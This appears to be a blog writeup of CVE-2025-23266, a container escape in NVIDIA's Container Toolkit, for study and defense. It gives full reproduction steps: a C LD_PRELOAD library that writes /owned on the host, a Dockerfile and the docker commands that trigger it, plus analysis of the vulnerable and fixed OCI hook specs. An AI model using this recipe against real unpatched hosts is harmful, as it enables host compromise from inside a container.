CVE-2025-23266 - A Detailed Writeup

Introduction

I read yesterday about a container escape in NVIDIA's Container Runtime. It goes without saying that this is a big deal: the exploit is rather simple, and as AI workloads increase, so does the use of containerized applications and GPUs. The writeup itself is pretty good, although it does not address a few details regarding the container runtime, more specifically, how container hooks work under the hood.

Writing this was a learning process for me, and I would like to share the whole journey with you.

Reproducing the issue

You can reproduce the issue yourself with the following steps (they are meant for Ubuntu, but easily adaptable for other distributions):

Install and Configure Nvidia Container Toolkit

  • Download the Nvidia Container Toolkit version 1.17.7 or earlier. The one I used was https://github.com/NVIDIA/nvidia-container-toolkit/releases/download/v1.17.7/nvidia-container-toolkit_1.17.7_deb_amd64.tar.gz
  • Unpack the .deb files to ~/release-v1.17.7-stable/packages/ubuntu18.04/amd64/
  • Then, run the following commands in order (with sudo):
dpkg -i libnvidia-container1_1.17.7-1_amd64.deb
dpkg -i libnvidia-container-tools_1.17.7-1_amd64.deb
dpkg -i nvidia-container-toolkit-base_1.17.7-1_amd64.deb 
dpkg -i nvidia-container-toolkit_1.17.7-1_amd64.deb
  • Configure the NVIDIA runtime by running:
sudo nvidia-ctk runtime configure --runtime=docker
  • Then, restart docker with:
sudo systemctl restart docker

Some of these steps are taken from here.

Create a shared library

This library will be loaded by the Docker Container runtime. As part of the exploit, we will use it as a parameter to LD_PRELOAD.

poc.c

// poc.c - minimal malicious LD_PRELOAD library (creates /owned)

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>

// This function is called when the shared library is loaded
__attribute__((constructor))
void init(void) {
    int fd = open("/owned", O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd != -1) {
        write(fd, "You have been owned!\n", 21);
        close(fd);
    }
}

Then build it with:

gcc -fPIC -shared -o poc.so poc.c

Configure hook

Add or edit the /etc/nvidia-container-runtime/config.toml file so it contains the following:

[nvidia-container-runtime.modes.legacy]
cuda-compat-mode = "hook"

That enables the CUDA Forward Compatibility mode with a hook. A detailed explanation will follow later in this post.

Create a docker image

This Docker image will contain the poc.so library that we created in the previous step.

Dockerfile

FROM busybox
ENV LD_PRELOAD=./poc.so
ADD poc.so /

The Dockerfile and poc.so must be in the same folder.

Then build the image with:

docker build . -t nvidiascape-exploit

The command should create a new Docker image tagged (-t) nvidiascape-exploit.

Then, run it with the following command:

docker run --rm --runtime=nvidia --gpus=all nvidiascape-exploit

If everything works right, you should see a /owned file in the host's root directory.

Understanding the issue

To properly understand how this exploit was crafted, we need to touch on a few subjects first:

  • Dynamic linker behavior
  • Docker alternate runtimes
  • CUDA Forward Compatibility
  • Container Device Interface

Dynamic linker behavior

Whenever an application runs, it might require shared libraries - binaries that are not part of the application itself, but distributed as part of another package. The dynamic linker's job is to resolve these libraries at runtime.

The dynamic linker provides a feature where shared libraries listed in the LD_PRELOAD environment variable take precedence over all others. As a debugging feature, this might sound nice, but it is damning for sensitive applications. The ld.so man page states:

   Secure-execution mode
       For security reasons, if the dynamic linker determines that a
       binary should be run in secure-execution mode, the effects of some
       environment variables are voided or modified, and furthermore
       those environment variables are stripped from the environment, so
       that the program does not even see the definitions. 
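
Secure-execution mode is signaled by the AT_SECURE entry in the auxiliary vector, which the kernel sets for set-user-ID binaries and similar cases. As a minimal sketch (my own illustration, assuming a 64-bit little-endian Linux with /proc mounted), you can read the flag straight out of /proc/self/auxv:

// atsecure.go - minimal sketch: print this process's AT_SECURE flag by
// parsing /proc/self/auxv (assumes 64-bit little-endian Linux).
package main

import (
	"encoding/binary"
	"fmt"
	"os"
)

const atSecure = 23 // AT_SECURE, from <elf.h>

func main() {
	raw, err := os.ReadFile("/proc/self/auxv")
	if err != nil {
		panic(err)
	}
	// The auxiliary vector is a sequence of word-sized (type, value) pairs.
	for off := 0; off+16 <= len(raw); off += 16 {
		typ := binary.LittleEndian.Uint64(raw[off:])
		val := binary.LittleEndian.Uint64(raw[off+8:])
		if typ == atSecure {
			fmt.Printf("AT_SECURE = %d\n", val) // non-zero means secure-execution mode
		}
	}
}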

As an experiment, try to run this in your terminal:

sudo LD_PRELOAD=/home/filiperodrigues/nvidiascape-exploit/poc.so find

You will end up with the same /owned file as in the original exploit: once sudo starts find, the process runs with matching real and effective UIDs (both root), so the loader is not in secure-execution mode and the preload is honored.

The poc.so itself is rather simple: upon initialization, it creates a /owned file, then writes some content to it.

void init(void) {
    int fd = open("/owned", O_WRONLY | O_CREAT | O_TRUNC, 0644);

The initializer is provided by the __attribute__((constructor)) function attribute.

Alternate runtimes

The default Docker runtime is runc. However, you can opt to use other runtimes that implement the OCI runtime interface. When you ran sudo nvidia-ctk runtime configure --runtime=docker earlier, you added an entry to the /etc/docker/daemon.json file, which should look like the following:

{
    "runtimes": {
        "nvidia": {
            "args": [],
            "path": "nvidia-container-runtime"
        }
    }
}

That tells Docker to use the nvidia-container-runtime binary whenever you run a container with --runtime=nvidia.
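
To get a feel for what an alternate runtime looks like, here is a minimal pass-through sketch (my own illustration, not the real nvidia-container-runtime): Docker invokes it exactly like runc, and it re-execs the real runc after a chance to inspect or rewrite the arguments.

// wrapper.go - minimal sketch of a pass-through OCI runtime wrapper;
// illustrative only, not the real nvidia-container-runtime.
package main

import (
	"log"
	"os"
	"os/exec"
	"syscall"
)

func main() {
	log.Printf("wrapper runtime invoked with: %v", os.Args)

	// A real wrapper (like nvidia-container-runtime) would locate the
	// container bundle's config.json here and modify the OCI spec before
	// handing off to the low-level runtime.
	runc, err := exec.LookPath("runc")
	if err != nil {
		log.Fatalf("runc not found: %v", err)
	}

	// Replace this process with runc, preserving argv and the environment.
	argv := append([]string{"runc"}, os.Args[1:]...)
	if err := syscall.Exec(runc, argv, os.Environ()); err != nil {
		log.Fatalf("exec runc: %v", err)
	}
}

The real nvidia-container-runtime follows this same shape, except that it rewrites the bundle's config.json before handing off, as the next sections show.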

CUDA Forward Compatibility

CUDA forward compatibility allows containers or applications that were built with a newer version of the CUDA toolkit (user-mode libraries) to run on systems where the host driver is slightly older, as long as certain compatibility libraries are present. This is particularly useful for containerized workloads where:

  • You might build and ship containers with newer CUDA versions than what the host has installed.
  • Upgrading drivers on production systems isn’t always immediate or practical.

According to the documentation:

The CUDA forward compatibility package will then be installed to the versioned toolkit directory. For example, 
for the CUDA forward compatibility package of 12.8, the GPU driver libraries of 570 will be installed in /usr/local/cuda-12.8/compat/.

It is important to note that these libraries are installed on the host.

The NVIDIA Container Runtime implements forward compatibility with a hook. If the nvidia-container-runtime.modes.legacy.cuda-compat-mode config option is set to "hook", the enable-cuda-compat hook is used.

The hook will then execute and mount the compat libraries under /usr/local/cuda/compat. The mechanism used is called the Container Device Interface (CDI).

Container device interface

When the runtime starts, it executes the following function:

// newNVIDIAContainerRuntime is a factory method that constructs a runtime based on the selected configuration and specified logger
func newNVIDIAContainerRuntime(logger logger.Interface, cfg *config.Config, argv []string, driver *root.Driver) (oci.Runtime, error) {
  lowLevelRuntime, err := oci.NewLowLevelRuntime(logger, cfg.NVIDIAContainerRuntimeConfig.Runtimes)
  if err != nil {
    return nil, fmt.Errorf("error constructing low-level runtime: %v", err)
  }

  logger.Tracef("Using low-level runtime %v", lowLevelRuntime.String())
  if !oci.HasCreateSubcommand(argv) {
    logger.Tracef("Skipping modifier for non-create subcommand")
    return lowLevelRuntime, nil
  }

  ociSpec, err := oci.NewSpec(logger, argv)
  if err != nil {
    return nil, fmt.Errorf("error constructing OCI specification: %v", err)
  }

  specModifier, err := newSpecModifier(logger, cfg, ociSpec, driver)
  if err != nil {
    return nil, fmt.Errorf("failed to construct OCI spec modifier: %v", err)
  }

  // Create the wrapping runtime with the specified modifier.
  r := oci.NewModifyingRuntimeWrapper(
    logger,
    lowLevelRuntime,
    ociSpec,
    specModifier,
  )

  return r, nil
}

The relevant parts are oci.NewSpec and newSpecModifier. These two functions:

  • Create an OCI specification object (ociSpec) from the command-line args. The OCI spec describes how the container should be set up (namespaces, mounts, env vars, etc).
  • Create a spec modifier - a helper object that knows how to tweak the OCI spec (e.g., to inject NVIDIA-specific libraries, mounts, hooks, etc., needed for GPU containers).

The OCI spec describes the actual container.
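
To make the modifier step concrete, here is a minimal sketch (using the standard github.com/opencontainers/runtime-spec/specs-go types; illustrative, not the toolkit's actual code) of how a createContainer hook gets appended to a spec. Note that nothing forces the caller to set an env for the hook:

// inject.go - minimal sketch of injecting a createContainer hook into an
// OCI spec; illustrative only, not the NVIDIA Container Toolkit's modifier.
package main

import (
	"encoding/json"
	"fmt"

	specs "github.com/opencontainers/runtime-spec/specs-go"
)

func main() {
	spec := &specs.Spec{Version: specs.Version}

	if spec.Hooks == nil {
		spec.Hooks = &specs.Hooks{}
	}
	spec.Hooks.CreateContainer = append(spec.Hooks.CreateContainer, specs.Hook{
		Path: "/usr/bin/nvidia-ctk",
		Args: []string{"nvidia-ctk", "hook", "enable-cuda-compat"},
		// Env is deliberately left unset here, mirroring the vulnerable
		// spec: with no explicit env, the hook can end up inheriting the
		// container's environment, LD_PRELOAD included.
	})

	out, _ := json.MarshalIndent(spec.Hooks, "", "  ")
	fmt.Println(string(out))
}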

You can see the actual spec by doing this:

  • Add the following to the newNVIDIAContainerRuntime function
  // Note: this snippet also needs "encoding/json" in the file's imports.
  if logger != nil {
      if specJSON, err := json.MarshalIndent(ociSpec, "", "  "); err == nil {
          logger.Infof("OCI Spec: %s", string(specJSON))
      } else {
          logger.Warningf("Failed to marshal OCI spec for logging: %v", err)
      }
  }
  • Edit the runtime config (/etc/nvidia-container-runtime/config.toml) to enable logs:
[nvidia-container-runtime]
debug = "/var/log/nvidia-container-runtime.log"

After that, you should see the following in the log:

{
  "ociVersion": "1.2.1",
  "process": {
    "user": {
      "uid": 0,
      "gid": 0,
      "additionalGids": [0, 10]
    },
    "args": [
      "sh"
    ],
    "env": [
      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
      "HOSTNAME=e078abd14abe",
      "LD_PRELOAD=./poc.so",
      "NVIDIA_VISIBLE_DEVICES=all"
    ],
    "cwd": "/",
    "capabilities": {
      "bounding": [
        "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FSETID", "CAP_FOWNER", "CAP_MKNOD", "CAP_NET_RAW",
        "CAP_SETGID", "CAP_SETUID", "CAP_SETFCAP", "CAP_SETPCAP", "CAP_NET_BIND_SERVICE",
        "CAP_SYS_CHROOT", "CAP_KILL", "CAP_AUDIT_WRITE"
      ],
      "effective": [
        "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FSETID", "CAP_FOWNER", "CAP_MKNOD", "CAP_NET_RAW",
        "CAP_SETGID", "CAP_SETUID", "CAP_SETFCAP", "CAP_SETPCAP", "CAP_NET_BIND_SERVICE",
        "CAP_SYS_CHROOT", "CAP_KILL", "CAP_AUDIT_WRITE"
      ],
      "permitted": [
        "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FSETID", "CAP_FOWNER", "CAP_MKNOD", "CAP_NET_RAW",
        "CAP_SETGID", "CAP_SETUID", "CAP_SETFCAP", "CAP_SETPCAP", "CAP_NET_BIND_SERVICE",
        "CAP_SYS_CHROOT", "CAP_KILL", "CAP_AUDIT_WRITE"
      ]
    },
    "apparmorProfile": "docker-default",
    "oomScoreAdj": 0
  },
  "root": {
    "path": "/var/lib/docker/overlay2/b29b8b924bfcb60a5b2adadd98c935fe659480f24be017259f56cf49ead0d3ed/merged"
  },
  "hostname": "e078abd14abe",
  "mounts": [
    {
      "destination": "/proc",
      "type": "proc",
      "source": "proc",
      "options": ["nosuid", "noexec", "nodev"]
    }
  ],
  "hooks": {
    "prestart": [
      {
        "path": "/usr/bin/nvidia-container-runtime-hook",
        "args": [
          "nvidia-container-runtime-hook",
          "prestart"
        ],
        "env": [
          "LANG=en_US.UTF-8",
          "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin",
          "NOTIFY_SOCKET=/run/systemd/notify",
          "INVOCATION_ID=6a71d6bbe6634f0baebf6075a9ece8b2",
          "JOURNAL_STREAM=8:22608",
          "SYSTEMD_EXEC_PID=2089",
          "OTEL_SERVICE_NAME=dockerd",
          "OTEL_EXPORTER_OTLP_TRACES_PROTOCOL=http/protobuf",
          "OTEL_EXPORTER_OTLP_METRICS_PROTOCOL=http/protobuf",
          "TMPDIR=/var/lib/docker/tmp"
        ]
      }
    ]
  },
    //etc

You will notice that LD_PRELOAD is part of the container spec's process environment.

To implement CUDA Forward Compatibility, the runtime edits the container spec by adding a new createContainer hook. This is mentioned in the Wiz writeup.

Before the fix, this is how the createContainer hooks would look:

    "createContainer": [
      {
        "path": "/usr/bin/nvidia-ctk",
        "args": [
          "nvidia-ctk",
          "hook",
          "enable-cuda-compat",
          "--host-driver-version=575.64.03"
        ]
      },
      {
        "path": "/usr/bin/nvidia-ctk",
        "args": [
          "nvidia-ctk",
          "hook",
          "update-ldcache"
        ]
      }

And this is how they would look after the fix:

    "createContainer": [
      {
        "path": "/usr/bin/nvidia-ctk",
        "args": [
          "nvidia-ctk",
          "hook",
          "enable-cuda-compat",
          "--host-driver-version=575.64.03"
        ],
        "env": [
          "NVIDIA_CTK_DEBUG=false"
        ]
      },
      {
        "path": "/usr/bin/nvidia-ctk",
        "args": [
          "nvidia-ctk",
          "hook",
          "update-ldcache"
        ],
        "env": [
          "NVIDIA_CTK_DEBUG=false"
        ]
      }

With the fix, the createContainer hooks have an explicit "env" section, which is not present without the fix.

This was an interesting finding, and confirmed what the Wiz post said:

createContainer hooks have a critical property: they inherit environment variables from the container image unless explicitly configured not to
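
Here is a minimal sketch of why that property is dangerous (my own illustration of the inheritance behavior, not runc's actual implementation): when the hook entry carries no env of its own, the executing process has to fall back to some inherited environment, and if that environment is the container's, LD_PRELOAD comes along for the ride.

// runhook.go - illustrative sketch (not runc's actual code) of how a hook
// with no env of its own can inherit a caller-supplied environment.
package main

import (
	"os"
	"os/exec"
)

// runHook executes a hook binary with hookEnv if it is set, otherwise it
// falls back to fallbackEnv - in the vulnerable scenario, the container's
// environment.
func runHook(path string, args []string, hookEnv, fallbackEnv []string) error {
	cmd := exec.Command(path)
	cmd.Args = args
	if hookEnv != nil {
		cmd.Env = hookEnv
	} else {
		cmd.Env = fallbackEnv
	}
	cmd.Stdout = os.Stdout
	cmd.Stderr = os.Stderr
	return cmd.Run()
}

func main() {
	// Simulate a container env smuggling LD_PRELOAD into a privileged hook:
	containerEnv := []string{"PATH=/usr/bin:/bin", "LD_PRELOAD=./poc.so"}
	// hookEnv == nil, so the hook sees the container's variables.
	_ = runHook("/usr/bin/env", []string{"env"}, nil, containerEnv)
}

Running it makes /usr/bin/env print LD_PRELOAD=./poc.so: the hook never asked for that variable, it simply inherited it.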

So to summarize, a spec like this:

{
  "ociVersion": "1.2.1",
  "process": {
    "user": {
      "uid": 0,
      "gid": 0,
      "additionalGids": [0, 10]
    },
    "args": [
      "sh"
    ],
    "env": [
      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
      "LD_PRELOAD=./poc.so",
      "NVIDIA_VISIBLE_DEVICES=all"
    ],
    "cwd": "/",
    "capabilities": {
      "bounding": [
        "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FSETID", "CAP_FOWNER", "CAP_MKNOD", "CAP_NET_RAW",
        "CAP_SETGID", "CAP_SETUID", "CAP_SETFCAP", "CAP_SETPCAP", "CAP_NET_BIND_SERVICE",
        "CAP_SYS_CHROOT", "CAP_KILL", "CAP_AUDIT_WRITE"
      ],
      "effective": [
        "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FSETID", "CAP_FOWNER", "CAP_MKNOD", "CAP_NET_RAW",
        "CAP_SETGID", "CAP_SETUID", "CAP_SETFCAP", "CAP_SETPCAP", "CAP_NET_BIND_SERVICE",
        "CAP_SYS_CHROOT", "CAP_KILL", "CAP_AUDIT_WRITE"
      ],
      "permitted": [
        "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FSETID", "CAP_FOWNER", "CAP_MKNOD", "CAP_NET_RAW",
        "CAP_SETGID", "CAP_SETUID", "CAP_SETFCAP", "CAP_SETPCAP", "CAP_NET_BIND_SERVICE",
        "CAP_SYS_CHROOT", "CAP_KILL", "CAP_AUDIT_WRITE"
      ]
    },
    "apparmorProfile": "docker-default",
    "oomScoreAdj": 0
  },
  "root": {
    "path": "/var/lib/docker/overlay2/b29b8b924bfcb60a5b2adadd98c935fe659480f24be017259f56cf49ead0d3ed/merged"
  },
  "hostname": "e078abd14abe",
  "mounts": [
    {
      "destination": "/proc",
      "type": "proc",
      "source": "proc",
      "options": ["nosuid", "noexec", "nodev"]
    }
  ],
  "hooks": {
    "prestart": [
      {
        "path": "/usr/bin/nvidia-container-runtime-hook",
        "args": [
          "nvidia-container-runtime-hook",
          "prestart"
        ],
        "env": [
          "LANG=en_US.UTF-8",
          "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin",
          "NOTIFY_SOCKET=/run/systemd/notify",
          "INVOCATION_ID=6a71d6bbe6634f0baebf6075a9ece8b2",
          "JOURNAL_STREAM=8:22608",
          "SYSTEMD_EXEC_PID=2089",
          "OTEL_SERVICE_NAME=dockerd",
          "OTEL_EXPORTER_OTLP_TRACES_PROTOCOL=http/protobuf",
          "OTEL_EXPORTER_OTLP_METRICS_PROTOCOL=http/protobuf",
          "TMPDIR=/var/lib/docker/tmp"
        ]
      }
    ],
    "createContainer": [
      {
        "path": "/usr/bin/nvidia-ctk",
        "args": [
          "nvidia-ctk",
          "hook",
          "enable-cuda-compat",
          "--host-driver-version=575.64.03"
        ]
      },
      {
        "path": "/usr/bin/nvidia-ctk",
        "args": [
          "nvidia-ctk",
          "hook",
          "update-ldcache"
        ]
      }
    ]
  },

is vulnerable to a container escape because:

  • At the container level, it sets LD_PRELOAD=./poc.so
  • The createContainer hooks do not set any environment variables, which makes them inherit the container's environment
  • The /usr/bin/nvidia-ctk binary runs at the host level, with high privileges

Final thoughts

Although all of the above was mentioned in most of the posts regarding this vulnerability, it was nonetheless interesting for me to dump the OCI container spec and understand what is going on "under the hood".

At some point, I would like to cover the "last mile" of this vulnerability, especially this part:

prestart hooks run in a clean, isolated context

I could not find anything to support this claim. I might need to do a few experiments myself.
